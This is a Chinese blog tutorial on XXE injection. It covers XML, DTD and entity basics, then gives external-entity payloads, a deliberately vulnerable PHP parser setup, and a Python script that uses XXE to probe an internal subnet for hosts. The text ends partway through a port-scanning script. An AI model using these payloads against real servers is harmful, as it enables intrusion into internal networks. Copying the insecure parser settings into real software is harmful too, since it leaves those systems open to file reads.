<!DOCTYPE HTML>
<html lang="zh-CN">


<head>
    <meta charset="utf-8">
    <meta name="keywords" content="XEE漏洞学习, Atmujie">
    <meta name="description" content="有一美人兮，见之不忘，一日不见兮，思之如狂；">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no">
    <meta name="renderer" content="webkit|ie-stand|ie-comp">
    <meta name="mobile-web-app-capable" content="yes">
    <meta name="format-detection" content="telephone=no">
    <meta name="apple-mobile-web-app-capable" content="yes">
    <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
    <!-- Global site tag (gtag.js) - Google Analytics -->


    <title>XEE漏洞学习 | Atmujie</title>
    <link rel="icon" type="image/png" href="/weblogo.png">

    <link rel="stylesheet" type="text/css" href="/libs/awesome/css/all.css">
    <link rel="stylesheet" type="text/css" href="/libs/materialize/materialize.min.css">
    <link rel="stylesheet" type="text/css" href="/libs/aos/aos.css">
    <link rel="stylesheet" type="text/css" href="/libs/animate/animate.min.css">
    <link rel="stylesheet" type="text/css" href="/libs/lightGallery/css/lightgallery.min.css">
    <link rel="stylesheet" type="text/css" href="/css/matery.css">
    <link rel="stylesheet" type="text/css" href="/css/my.css">

    <script src="/libs/jquery/jquery.min.js"></script>

<meta name="generator" content="Hexo 5.4.0"><link rel="stylesheet" href="/css/prism-tomorrow.css" type="text/css">
<link rel="stylesheet" href="/css/prism-line-numbers.css" type="text/css"></head>




<body>
    <header class="navbar-fixed">
    <nav id="headNav" class="bg-color nav-transparent">
        <div id="navContainer" class="nav-wrapper container">
            <div class="brand-logo">
                <a href="/" class="waves-effect waves-light">
                    
                    <img src="/medias/logo.png" class="logo-img" alt="LOGO">
                    
                    <span class="logo-span">Atmujie</span>
                </a>
            </div>
            

<a href="#" data-target="mobile-nav" class="sidenav-trigger button-collapse"><i class="fas fa-bars"></i></a>
<ul class="right nav-menu">
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/" class="waves-effect waves-light">
      
      <i class="fas fa-home" style="zoom: 0.6;"></i>
      
      <span>首页</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/archives" class="waves-effect waves-light">
      
      <i class="fas fa-archive" style="zoom: 0.6;"></i>
      
      <span>归档</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="" class="waves-effect waves-light">

      
      <i class="fas fa-address-book" style="zoom: 0.6;"></i>
      
      <span>友情链接</span>
      <i class="fas fa-chevron-down" aria-hidden="true" style="zoom: 0.6;"></i>
    </a>
    <ul class="sub-nav menus_item_child ">
      
      <li>
        <a href="/friends">
          
          <i class="fas fa-address-book" style="margin-top: -20px; zoom: 0.6;"></i>
          
          <span>Friends</span>
        </a>
      </li>
      
      <li>
        <a href="/BlogLink">
          
          <i class="fas fa-address-book" style="margin-top: -20px; zoom: 0.6;"></i>
          
          <span>BlogLink</span>
        </a>
      </li>
      
    </ul>
    
  </li>
  
  <li>
    <a href="#searchModal" class="modal-trigger waves-effect waves-light">
      <i id="searchIcon" class="fas fa-search" title="搜索" style="zoom: 0.85;"></i>
    </a>
  </li>
</ul>


<div id="mobile-nav" class="side-nav sidenav">

    <div class="mobile-head bg-color">
        
        <img src="/medias/logo.png" class="logo-img circle responsive-img">
        
        <div class="logo-name">Atmujie</div>
        <div class="logo-desc">
            
            有一美人兮，见之不忘，一日不见兮，思之如狂；
            
        </div>
    </div>

    

    <ul class="menu-list mobile-menu-list">
        
        <li class="m-nav-item">
	  
		<a href="/" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-home"></i>
			
			首页
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/archives" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-archive"></i>
			
			归档
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="javascript:;">
			
				<i class="fa-fw fas fa-address-book"></i>
			
			友情链接
			<span class="m-icon"><i class="fas fa-chevron-right"></i></span>
		</a>
            <ul  style="background:  ;" >
              
                <li>

                  <a href="/friends " style="margin-left:75px">
				  
				   <i class="fa fas fa-address-book" style="position: absolute;left:50px" ></i>
			      
		          <span>Friends</span>
                  </a>
                </li>
              
                <li>

                  <a href="/BlogLink " style="margin-left:75px">
				  
				   <i class="fa fas fa-address-book" style="position: absolute;left:50px" ></i>
			      
		          <span>BlogLink</span>
                  </a>
                </li>
              
            </ul>
          
        </li>
        
        
    </ul>
</div>


        </div>

        
    </nav>

</header>

    



<div class="bg-cover pd-header post-cover" style="background-image: url('/medias/featureimages/7.jpg')">
    <div class="container" style="right: 0px;left: 0px;">
        <div class="row">
            <div class="col s12 m12 l12">
                <div class="brand">
                    <h1 class="description center-align post-title">XEE漏洞学习</h1>
                </div>
            </div>
        </div>
    </div>
</div>




<main class="post-container content">

    
    <link rel="stylesheet" href="/libs/tocbot/tocbot.css">
<style>
    #articleContent h1::before,
    #articleContent h2::before,
    #articleContent h3::before,
    #articleContent h4::before,
    #articleContent h5::before,
    #articleContent h6::before {
        display: block;
        content: " ";
        height: 100px;
        margin-top: -100px;
        visibility: hidden;
    }

    #articleContent :focus {
        outline: none;
    }

    .toc-fixed {
        position: fixed;
        top: 64px;
    }

    .toc-widget {
        width: 345px;
        padding-left: 20px;
    }

    .toc-widget .toc-title {
        margin: 35px 0 15px 0;
        padding-left: 17px;
        font-size: 1.5rem;
        font-weight: bold;
        line-height: 1.5rem;
    }

    .toc-widget ol {
        padding: 0;
        list-style: none;
    }

    #toc-content {
        height: calc(100vh - 250px);
        overflow: auto;
    }

    #toc-content ol {
        padding-left: 10px;
    }

    #toc-content ol li {
        padding-left: 10px;
    }

    #toc-content .toc-link:hover {
        color: #42b983;
        font-weight: 700;
        text-decoration: underline;
    }

    #toc-content .toc-link::before {
        background-color: transparent;
        max-height: 25px;

        position: absolute;
        right: 23.5vw;
        display: block;
    }

    #toc-content .is-active-link {
        color: #42b983;
    }

    #floating-toc-btn {
        position: fixed;
        right: 15px;
        bottom: 76px;
        padding-top: 15px;
        margin-bottom: 0;
        z-index: 998;
    }

    #floating-toc-btn .btn-floating {
        width: 48px;
        height: 48px;
    }

    #floating-toc-btn .btn-floating i {
        line-height: 48px;
        font-size: 1.4rem;
    }
</style>
<div class="row">
    <div id="main-content" class="col s12 m12 l9">
        <!-- 文章内容详情 -->
<div id="artDetail">
    <div class="card">
        <div class="card-content article-info">
            <div class="row tag-cate">
                <div class="col s7">
                    
                    <div class="article-tag">
                        
                            <a href="/tags/Web%E5%AE%89%E5%85%A8/">
                                <span class="chip bg-color">Web安全</span>
                            </a>
                        
                    </div>
                    
                </div>
                <div class="col s5 right-align">
                    
                </div>
            </div>

            <div class="post-info">
                
                <div class="post-date info-break-policy">
                    <i class="far fa-calendar-minus fa-fw"></i>发布日期:&nbsp;&nbsp;
                    2021-09-17
                </div>
                

                

                

                

                
            </div>
        </div>
        <hr class="clearfix">
        <div class="card-content article-card-content">
            <div id="articleContent">
                <h2 id="XXE——外部实体注入概述"><a href="#XXE——外部实体注入概述" class="headerlink" title="XXE——外部实体注入概述"></a>XXE——外部实体注入概述</h2><p><strong>XXE：XML External Entity 即外部实体，从安全角度理解成XML External Entity attack 外部实体注入攻击</strong></p>
<blockquote>
<p>概述</p>
</blockquote>
<p>XML 被设计用来传输和存储数据。</p>
<p>HTML 被设计用来显示数据。</p>
<p>XML 不会替代 HTML，理解这一点很重要。在大多数 Web 应用程序中，XML 用于传输数据，而 HTML 用于格式化并显示数据。</p>
<h3 id="XML语法规则"><a href="#XML语法规则" class="headerlink" title="XML语法规则"></a>XML语法规则</h3><ul>
<li><p>xml 必须包含根元素，它是所有其他元素的父元素，比如以下实例中 root 就是根元素：</p>
<pre class="line-numbers language-xml"><code class="language-xml"><span class="token prolog">&lt;?xml version="1.0" encoding="UTF-8"?></span> //文档开头必须
<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>root</span><span class="token punctuation">></span></span>
  <span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>child</span><span class="token punctuation">></span></span>
    <span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>subchild</span><span class="token punctuation">></span></span>.....<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>subchild</span><span class="token punctuation">></span></span>
  <span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>child</span><span class="token punctuation">></span></span>
<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>root</span><span class="token punctuation">></span></span>
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
</li>
<li><p>在 XML 中，省略关闭标签是非法的。所有元素都<strong>必须</strong>有关闭标签</p>
</li>
<li><p>XML 标签对大小写敏感。标签 <Letter> 与标签 <letter> 是不同的。必须使用相同的大小写来编写打开标签和关闭标签</p>
</li>
<li><p>在 XML 中，所有元素都<strong>必须</strong>彼此正确地嵌套</p>
</li>
<li><p>XML的注释同html</p>
</li>
<li><p>XML中空格会被保留，而HTML会把多个字符裁剪为一个</p>
</li>
<li><p><strong>XML的标签可以自定义，就是说可以随便改</strong></p>
</li>
<li><p><strong>XML 的属性值必须加引号</strong></p>
<pre class="line-numbers language-xml"><code class="language-xml"><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>note</span> <span class="token attr-name">date</span><span class="token attr-value"><span class="token punctuation">=</span><span class="token punctuation">"</span>12/11/2007<span class="token punctuation">"</span></span><span class="token punctuation">></span></span>
<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>to</span><span class="token punctuation">></span></span>Tove<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>to</span><span class="token punctuation">></span></span>
<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>from</span><span class="token punctuation">></span></span>Jani<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>from</span><span class="token punctuation">></span></span>
<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>note</span><span class="token punctuation">></span></span>
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span></span></code></pre>
</li>
</ul>
<p>简单来说就是xml语法基本同html，但是远比html要严格</p>
<h3 id="XML实体"><a href="#XML实体" class="headerlink" title="XML实体"></a>XML实体</h3><p>在 XML 中，一些字符拥有特殊的意义。</p>
<p>如果您把字符 “&lt;” 放在 XML 元素中，会发生错误，这是因为解析器会把它当作新元素的开始。</p>
<blockquote>
<p><strong>实体是用于定义引用普通文本或特殊字符的快捷方式的变量</strong></p>
</blockquote>
<p>为了避免这个错误，需要<strong>实体引用</strong>来代替 “&lt;” 字符：</p>
<pre class="line-numbers language-xml"><code class="language-xml">在 XML 中，有 5 个预定义的实体引用
<span class="token entity" title="&lt;">&amp;lt;</span>    &lt;    小于
<span class="token entity" title="&gt;">&amp;gt;</span>    >    大于
<span class="token entity" title="&amp;">&amp;amp;</span>    &amp;    &amp;符
<span class="token entity" title="&apos;">&amp;apos;</span>    '    单引
<span class="token entity" title="&quot;">&amp;quot;</span>    "    双引
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<ul>
<li><p>在 Windows 应用程序中，换行通常以一对字符来存储：回车符（CR）和换行符（LF）。</p>
<p>  在 Unix 和 Mac OSX 中，使用 LF 来存储新行。</p>
<p>  在旧的 Mac 系统中，使用 CR 来存储新行。</p>
<p>  XML 以 LF 存储换行。</p>
</li>
</ul>
<blockquote>
<p><strong>所有的XML文档都由五种简单的构建模块（元素，属性，实体，PCDATA CDATA）构成</strong></p>
</blockquote>
<h3 id="XML-DTD"><a href="#XML-DTD" class="headerlink" title="XML DTD"></a>XML DTD</h3><p>DTD（文档类型定义）的作用是定义 XML 文档的合法构建模块。</p>
<p>DTD 的声明方式分为两种：内部 DTD 和外部 DTD ，其区别就在于：对 XML 文档中的元素、属性和实体的 DTD 的声明是在 XML 文档内部引用还是引用外部的 dtd 文件。</p>
<blockquote>
<p>内部DTD</p>
</blockquote>
<pre class="line-numbers language-xml"><code class="language-xml"><span class="token prolog">&lt;?xml version="1.0"?></span> //声明xml版本
<span class="token doctype">&lt;!DOCTYPE note [   //声明此文档是note类型的文档
&lt;!ELEMENT note (to,from,heading,body)></span>  //声明此文档的所有元素
<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>!ELEMENT</span> <span class="token attr-name">to</span> <span class="token attr-name">(#PCDATA)</span><span class="token punctuation">></span></span>  //定义to元素的类型为PCDATA
<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>!ELEMENT</span> <span class="token attr-name">from</span> <span class="token attr-name">(#PCDATA)</span><span class="token punctuation">></span></span>  // 定义from元素类型为PCDATA
<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>!ELEMENT</span> <span class="token attr-name">heading</span> <span class="token attr-name">(#PCDATA)</span><span class="token punctuation">></span></span> // 定义heading为PCDATA
<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>!ELEMENT</span> <span class="token attr-name">body</span> <span class="token attr-name">(#PCDATA)</span><span class="token punctuation">></span></span>  // 定义body为PCDATA
<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>!ENTITY</span> <span class="token attr-name">writer</span> <span class="token attr-name">"hello</span> <span class="token attr-name">world"</span><span class="token punctuation">></span></span> // 定义一个内部实体
]>
<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>note</span><span class="token punctuation">></span></span>
<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>to</span><span class="token punctuation">></span></span>Tove<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>to</span><span class="token punctuation">></span></span>
<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>from</span><span class="token punctuation">></span></span>Jani<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>from</span><span class="token punctuation">></span></span>
<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>heading</span><span class="token punctuation">></span></span>Reminder<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>heading</span><span class="token punctuation">></span></span>
<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>body</span><span class="token punctuation">></span></span>Don't forget me this weekend<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>body</span><span class="token punctuation">></span></span>
<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>note</span><span class="token punctuation">></span></span>
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<blockquote>
<p>外部DTD</p>
</blockquote>
<p>外部引用分为通用实体和参数实体</p>
<ul>
<li><p>通用实体</p>
<pre class="line-numbers language-xml"><code class="language-xml"><span class="token prolog">&lt;?xml version="1.0" encoding="UTF-8"?></span>
<span class="token doctype">&lt;!DOCTYPE foo [
&lt;!ELEMENT foo ANY ></span> #定义元素为ANY，即可以接受任何元素。
&lt;!ENTITY xxe SYSTEM "file:///c:/test.dtd" >]> // 定义通用实体
<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>root</span><span class="token punctuation">></span></span>
<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>body</span><span class="token punctuation">></span></span><span class="token entity" title="&xxe;">&amp;xxe;</span><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>body</span><span class="token punctuation">></span></span> #定义一个外部实体
<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>root</span><span class="token punctuation">></span></span>
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
</li>
</ul>
<p>通过第 4 行的定义， 第 7 行的 &amp;xxe 就会对 c:/test.dtd 文件资源进行 SYSTEM 关键字的引用，这样对引用资源所做的任何更改都会在文档中自动更新。</p>
<p>另外除了上面 SYSTEM 关键字的引用方式，还有一种引用方式是使用 PUBLIC 引用公用 DTD 的方式，语法如下：</p>
<pre><code>&lt;!DOCTYPE 根元素名称 PUBLIC “DTD标识名” “公用DTD的URI”&gt;
</code></pre>
<p>这个在我们的攻击中也可以起到和 SYSTEM 一样的作用，但实际上实体远不止这一种，我们以上涉及的实体只是其中的一种，被称为通用实体。</p>
<ul>
<li><p>参数实体</p>
<pre class="line-numbers language-xml"><code class="language-xml"><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>!ENTITY</span> <span class="token attr-name">%</span> <span class="token attr-name">an-element</span> <span class="token attr-name">"&lt;!ELEMENT</span> <span class="token attr-name">mytag</span> <span class="token attr-name">(subtag)</span><span class="token punctuation">></span></span>">
&lt;!ENTITY % remote-dtd SYSTEM "http://somewhere.example.org/remote.dtd">
%an-element; %remote-dtd;
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span></span></code></pre>
<p>  在上面的代码示例中，可以看到实体名前多了一个 “%” ，在参数实体中使用 “% 实体名” (这里面的空格不能少) 定义，并且只能在 DTD 中使用 “% 实体名” 引用。</p>
</li>
</ul>
<blockquote>
<p>通用实体和参数实体的区别</p>
</blockquote>
<ul>
<li><p><strong>“参数实体”在 DTD 中声明并在 DTD 中使用</strong></p>
<p>  DTD文件中只有参数实体才能引用其他实体</p>
</li>
<li><p><strong>“通用实体”在 DTD 中声明并在 XML 文档中使用</strong></p>
<p>  XML中必须要用通用实体引用DTD</p>
</li>
</ul>
<p>通过 DTD，您的每一个 XML 文件均可携带一个有关其自身格式的描述。</p>
<p>通过 DTD，独立的团体可一致地使用某个标准的 DTD 来交换数据。</p>
<p>而您的应用程序也可使用某个标准的 DTD 来验证从外部接收到的数据。</p>
<p>您还可以使用 DTD 来验证您自身的数据。</p>
<h2 id="XXE注入实例"><a href="#XXE注入实例" class="headerlink" title="XXE注入实例"></a>XXE注入实例</h2><pre class="line-numbers language-php"><code class="language-php"><span class="token delimiter">&lt;?php</span>
  <span class="token function">libxml_disable_entity_loader</span> <span class="token punctuation">(</span><span class="token boolean">false</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
  <span class="token variable">$xmlfile</span> <span class="token operator">=</span> <span class="token function">file_get_contents</span><span class="token punctuation">(</span>'php<span class="token punctuation">:</span><span class="token comment" spellcheck="true">//input');</span>
  <span class="token variable">$dom</span> <span class="token operator">=</span> <span class="token keyword">new</span> <span class="token class-name">DOMDocument</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
  <span class="token variable">$dom</span><span class="token operator">-</span><span class="token operator">></span><span class="token function">loadXML</span><span class="token punctuation">(</span><span class="token variable">$xmlfile</span><span class="token punctuation">,</span> <span class="token constant">LIBXML_NOENT</span> <span class="token operator">|</span> <span class="token constant">LIBXML_DTDLOAD</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
  <span class="token variable">$creds</span> <span class="token operator">=</span> <span class="token function">simplexml_import_dom</span><span class="token punctuation">(</span><span class="token variable">$dom</span><span class="token punctuation">)</span><span class="token punctuation">;</span>   <span class="token keyword">echo</span> <span class="token variable">$creds</span><span class="token punctuation">;</span>
<span class="token delimiter">?></span>
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<h3 id="libxml-disable-entity-loader"><a href="#libxml-disable-entity-loader" class="headerlink" title="libxml_disable_entity_loader"></a>libxml_disable_entity_loader</h3><blockquote>
<p>禁用加载外部实体的功能</p>
<p>当值为false时开启对xml实体的加载功能</p>
<p>默认是禁用的</p>
</blockquote>
<h3 id="php-input、-POST与-HTTP-RAW-POST-DATA"><a href="#php-input、-POST与-HTTP-RAW-POST-DATA" class="headerlink" title="php://input、$_POST与$HTTP_RAW_POST_DATA"></a>php://input、$_POST与$HTTP_RAW_POST_DATA</h3><ul>
<li><strong>$_POST</strong></li>
</ul>
<blockquote>
<p>这是在数据交互时的常用方法，但不能接收json格式的数据，因为==post是以关联数组方式组织提交的数据==，并对此进行<strong>编码处理</strong>，如urldecode，甚至<strong>编码转换</strong>，识别的<strong>数据类型是PHP默认识别的数据类型</strong>，如<strong>application/x-<a target="_blank" rel="noopener" href="http://www.form-urlencoded/">www.form-urlencoded</a></strong>和<strong>multipart/form-data</strong>，无法解析如<strong>text/xml</strong>，<strong>application/json</strong>等非<strong>application/x-<a target="_blank" rel="noopener" href="http://www.form-urlencoded/">www.form-urlencoded</a></strong> 数据类型的内容。</p>
</blockquote>
<ul>
<li>$HTTP_RAW_POST_DATA</li>
</ul>
<blockquote>
<p>==PHP默认识别的数据类型是application/x-<a target="_blank" rel="noopener" href="http://www.form-urlencoded==,当**content-type=application/json">www.form-urlencoded==,当**Content-Type=application/json</a>**<br><strong>类型时无法通过 $_POST获取</strong>，但是使用 GLOBALS[‘HTTP_RAW_POST_DATA’]可以获取到。因为在PHP无法识别Content-Type的时候，就会把 POST 数据填入HTTP_RAW_POST_DATA 中。但<strong>这种方法需要设置 php.ini 中的 always_populate_raw_post_data 值为 On 才会生效</strong>，且当POST 与php://input可以取到值时 $HTTP_RAW_POST_DATA 为空，当enctype=”multipart/form-data”时也无法使用。</p>
<p><strong>php7已经移除了这个全局变量</strong></p>
</blockquote>
<ul>
<li><strong>php://input</strong></li>
</ul>
<blockquote>
<p>除<strong>Coentent-Type为multipart/form-data</strong>之外，PHP<strong>都会将http请求数据包中的相应数据填入php://input</strong>，填入的<strong>长度由Coentent-Length指定</strong>。并且只有当<strong>Content-Type为application/x-www-data-urlencoded</strong>时，php://input数据才跟$_POST数据相一致（格式不一致，内容一致）。</p>
</blockquote>
<h3 id="HTML-DOM-Document-对象"><a href="#HTML-DOM-Document-对象" class="headerlink" title="HTML DOM Document 对象"></a>HTML DOM Document 对象</h3><p>每个载入浏览器的 HTML 文档都会成为 Document 对象。</p>
<p>Document 对象使我们可以从脚本中对 HTML 页面中的所有元素进行访问。</p>
<h4 id="loadXML-方法"><a href="#loadXML-方法" class="headerlink" title="loadXML() 方法"></a>loadXML() 方法</h4><p>loadXML() 方法通过解析一个 XML 标签字符串来组成该文档。</p>
<p>语法：</p>
<pre class="line-numbers language-xml"><code class="language-xml">loadXML(text)
<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<ul>
<li><p><strong>LIBXML_NOENT</strong> 该标志允许替换XML字符实体引用(无论是否外部).</p>
<p>  如果没有LIBXML_NOENT，它将导致内部和外部实体的行为不同，因为不会加载内部和外部实体.</p>
</li>
<li><p><strong>LIBXML_DTDLOAD</strong> 该表示允许加载DTD</p>
</li>
</ul>
<h3 id="simplexml-import-dom"><a href="#simplexml-import-dom" class="headerlink" title="simplexml_import_dom()"></a>simplexml_import_dom()</h3><p>该函数把 DOM 节点转换为 SimpleXMLElement 对象。</p>
<h4 id="语法"><a href="#语法" class="headerlink" title="语法"></a>语法</h4><pre class="line-numbers language-php"><code class="language-php"><span class="token function">simplexml_import_dom</span><span class="token punctuation">(</span>data<span class="token punctuation">,</span><span class="token keyword">class</span><span class="token punctuation">)</span>
<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<table>
<thead>
<tr>
<th align="left">参数</th>
<th align="left">描述</th>
</tr>
</thead>
<tbody><tr>
<td align="left">data</td>
<td align="left">必需。规定要使用的 DOM 节点。</td>
</tr>
<tr>
<td align="left">class</td>
<td align="left">必需。规定新对象的 class。</td>
</tr>
</tbody></table>
<blockquote>
<p>因为xml的特性（语法严格），所以flag中包含如<code>&lt;&gt;&amp;&quot;&#39;</code>等会报错，所以这时需要使用CDATA，或者base64编码</p>
<p>什么是CDATA：</p>
<p>CDATA，意为character data，是标记语言SGML与XML，表示文档的特定部分是普通的字符数据，而不是非字符数据或有特定、限定结构的字符数据。在XML文档或外部实体中，一个CDATA section是一段按字面解释的内容，不作为标记文本。字符用CDATA节表示或者按照标准语法表示，并无差异。</p>
<p>CDATA 部分由<code>&quot;&lt;![CDATA[&quot;</code>开始，由<code>&quot;]]&gt;&quot;</code>结束</p>
</blockquote>
<h2 id="可用协议和平台的关系"><a href="#可用协议和平台的关系" class="headerlink" title="可用协议和平台的关系"></a>可用协议和平台的关系</h2><h3 id="总结概述："><a href="#总结概述：" class="headerlink" title="总结概述："></a>总结概述：</h3><blockquote>
<p>XXE和SSRF都能从服务器向另一台服务器发起请求，如果将远程服务器的地址换成某个内网的地址，（比如 192.168.0.10:8080）也能实现 SSRF 同样的效果</p>
<p>XXE 其实也是一种 SSRF 的攻击手法，因为 SSRF 其实只是一种攻击模式，利用这种攻击模式我们能使用很多的协议以及漏洞进行攻击。</p>
</blockquote>
<p><strong>所以在进行XXE攻击时，我们必须知道在何种平台能使用何种协议</strong></p>
<p><img src="https://ca0y1h-bucket-1.oss-cn-hangzhou.aliyuncs.com/blog_img/20200201214217.png" alt="img"></p>
<h2 id="HTTP内网探测主机"><a href="#HTTP内网探测主机" class="headerlink" title="HTTP内网探测主机"></a>HTTP内网探测主机</h2><blockquote>
<p>正如刚才说的，XXE的本质其实就是一种SSRF。所以SSRF可以做到的事情XXE自然也能做到</p>
<p>因此XXE也可以探测内网主机</p>
</blockquote>
<p>内网探测主机脚本：</p>
<pre class="line-numbers language-python"><code class="language-python"><span class="token keyword">import</span> requests
<span class="token keyword">import</span> base64
<span class="token keyword">def</span> <span class="token function">XXE</span><span class="token punctuation">(</span>ip<span class="token punctuation">,</span>string<span class="token punctuation">)</span><span class="token punctuation">:</span>
    <span class="token keyword">try</span><span class="token punctuation">:</span>
        xml <span class="token operator">=</span> <span class="token triple-quoted-string string">"""&lt;?xml version="1.0" encoding="ISO-8859-1"?>"""</span>
        xml <span class="token operator">=</span> xml <span class="token operator">+</span> <span class="token string">"\r\n"</span> <span class="token operator">+</span> <span class="token triple-quoted-string string">"""&lt;!DOCTYPE foo [ &lt;!ELEMENT foo ANY >"""</span>
        xml <span class="token operator">=</span> xml <span class="token operator">+</span> <span class="token string">"\r\n"</span> <span class="token operator">+</span> <span class="token triple-quoted-string string">"""&lt;!ENTITY xxe SYSTEM """</span> <span class="token operator">+</span> <span class="token string">'"'</span> <span class="token operator">+</span> string <span class="token operator">+</span> <span class="token string">'"'</span> <span class="token operator">+</span> <span class="token triple-quoted-string string">""">]>"""</span>
        xml <span class="token operator">=</span> xml <span class="token operator">+</span> <span class="token string">"\r\n"</span> <span class="token operator">+</span> <span class="token triple-quoted-string string">"""&lt;xml>"""</span>
        xml <span class="token operator">=</span> xml <span class="token operator">+</span> <span class="token string">"\r\n"</span> <span class="token operator">+</span> <span class="token triple-quoted-string string">"""    &lt;stuff>&amp;xxe;&lt;/stuff>"""</span>
        xml <span class="token operator">=</span> xml <span class="token operator">+</span> <span class="token string">"\r\n"</span> <span class="token operator">+</span> <span class="token triple-quoted-string string">"""&lt;/xml>"""</span>
        x <span class="token operator">=</span> requests<span class="token punctuation">.</span>post<span class="token punctuation">(</span><span class="token string">'http://192.168.50.132/xxe_blind_test.php'</span><span class="token punctuation">,</span> data<span class="token operator">=</span>xml<span class="token punctuation">,</span> headers<span class="token operator">=</span>headers<span class="token punctuation">,</span> timeout<span class="token operator">=</span><span class="token number">5</span><span class="token punctuation">)</span><span class="token punctuation">.</span>text
        coded_string <span class="token operator">=</span> x<span class="token punctuation">.</span>split<span class="token punctuation">(</span><span class="token string">' '</span><span class="token punctuation">)</span><span class="token punctuation">[</span><span class="token operator">-</span><span class="token number">2</span><span class="token punctuation">]</span>
        <span class="token keyword">print</span><span class="token punctuation">(</span><span class="token string">' [+]'</span><span class="token punctuation">,</span>ip<span class="token punctuation">,</span><span class="token string">'Successfully Found !!!'</span><span class="token punctuation">)</span>
    <span class="token keyword">except</span><span class="token punctuation">:</span>
        <span class="token keyword">print</span><span class="token punctuation">(</span><span class="token string">' [-]'</span><span class="token punctuation">,</span>ip<span class="token punctuation">,</span><span class="token string">'Error Not Found !!!'</span><span class="token punctuation">)</span>  
        <span class="token keyword">pass</span>
    
<span class="token keyword">if</span> __name__ <span class="token operator">==</span> <span class="token string">'__main__'</span><span class="token punctuation">:</span>
    headers <span class="token operator">=</span> <span class="token punctuation">{</span><span class="token string">'Content-Type'</span><span class="token punctuation">:</span><span class="token string">'application/xml'</span><span class="token punctuation">}</span>
    <span class="token keyword">for</span> i <span class="token keyword">in</span> range<span class="token punctuation">(</span><span class="token number">1</span><span class="token punctuation">,</span><span class="token number">255</span><span class="token punctuation">)</span><span class="token punctuation">:</span>
        ip <span class="token operator">=</span> <span class="token string">'192.168.50.'</span> <span class="token operator">+</span> str<span class="token punctuation">(</span>i<span class="token punctuation">)</span>
        string <span class="token operator">=</span> <span class="token string">'php://filter/convert.base64-encode/resource=http://'</span> <span class="token operator">+</span> ip <span class="token operator">+</span> <span class="token string">'/'</span>
        XXE<span class="token punctuation">(</span>ip<span class="token punctuation">,</span>string<span class="token punctuation">)</span>
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p>探测到主机后，我们要对其进行端口扫描，原理同探测主机，只不过室将遍历ip地址变成了遍历端口号</p>
<p>当然也可以使用burp和nmap探测</p>
<p>XXE端口探测端口脚本</p>
<pre class="line-numbers language-python"><code class="language-python"><span class="token keyword">import</span> requests
<span class="token keyword">import</span> base64
<span class="token keyword">def</span> <span class="token function">XXE</span><span class="token punctuation">(</span>port<span class="token punctuation">)</span><span class="token punctuation">:</span>
    xml <span class="token operator">=</span> <span class="token triple-quoted-string string">"""&lt;?xml version="1.0" encoding="utf-8"?> """</span>
